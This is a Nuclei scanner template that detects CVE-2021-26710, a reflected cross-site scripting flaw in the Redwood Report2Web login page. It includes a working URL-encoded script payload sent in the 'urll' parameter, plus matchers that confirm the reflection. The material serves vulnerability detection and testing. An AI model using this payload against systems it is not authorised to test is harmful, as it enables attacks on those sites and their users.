nuclei-templates/cves/2021/CVE-2021-26710.yaml

37 lines
958 B
YAML

id: CVE-2021-26710
info:
name: Redwood v4.3.4.5-v4.5.3 XSS
author: pikpikcu
severity: medium
description: A cross-site scripting (XSS) issue in the login panel in Redwood Report2Web 4.3.4.5 and 4.5.3 allows remote attackers to inject JavaScript via the signIn.do urll parameter.
reference:
- https://vict0ni.me/report2web-xss-frame-injection.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-26710
cwe-id: CWE-79
tags: cve,cve2021,redwood,xss
requests:
- method: GET
path:
- "{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header